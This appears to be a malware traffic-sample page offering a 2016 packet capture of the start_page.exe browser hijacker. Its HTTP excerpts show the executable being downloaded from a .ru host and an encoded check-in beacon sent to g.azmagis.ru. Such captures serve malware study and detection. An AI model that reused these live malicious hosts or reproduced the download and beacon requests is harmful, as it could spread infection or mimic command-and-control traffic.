Text Example

start_page.exe Malware Browser Hijacker g.azmagis.ru PCAP Download Traffic Sample

Download Attachments

  • 1 pcap startpage
    Date added: October 23, 2016 6:11 am
    Added by: admin
    File size: 30 KB
    Downloads: 81

2016-10-23 00:58:22.814458 IP 192.168.1.102.58766 > 82.118.16.20.80: Flags [P.], seq 0:303, ack 1, win 256, length 303: HTTP: GET /start_page.exe HTTP/1.1
E..WQ.@……..fRv…..PJ…J.N.P…G}..GET /start_page.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: tdrvmizfzhzm.fewservice.ru
Connection: Keep-Alive

2016-10-23 00:58:31.076457 IP 192.168.1.102.58768 > 185.20.186.52.80: Flags [P.], seq 0:500, ack 1, win 256, length 500: HTTP: GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%66%56%73%13%66%36%56%23%23%53%63%36%43%66%73%03%26%93%46%26%73%36%16%63%46%46%43%56%53%63%63%66%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
E…A.@….q…f…4…P…&.s..P…U…GET /%f3%07%27%f6%46%d3%37%47%16%27%47%f5%07%16%76%56%62%67%56%27%37%96%f6%e6%d3%33%e2%33%53%62%76%57%96%46%d3%66%56%73%13%66%36%56%23%23%53%63%36%43%66%73%03%26%93%46%26%73%36%16%63%46%46%43%56%53%63%63%66%62%d6%96%46%d3%56%33%33%56%56%46%43%26%53%53%83%03%03%26%56%13%36%13%93%66%56%33%26%93%63%23%66%53%93%16%73%73%62%f6%37%d3%53%e2%13%62%26%96%47%d3%33%23%62%16%36%47%96%f6%e6%d3%07%16%27%16%d6%f5%66%16%96%c6 HTTP/1.1
User-Agent: start_page 3.35
Host: g.azmagis.ru
Cache-Control: no-cache
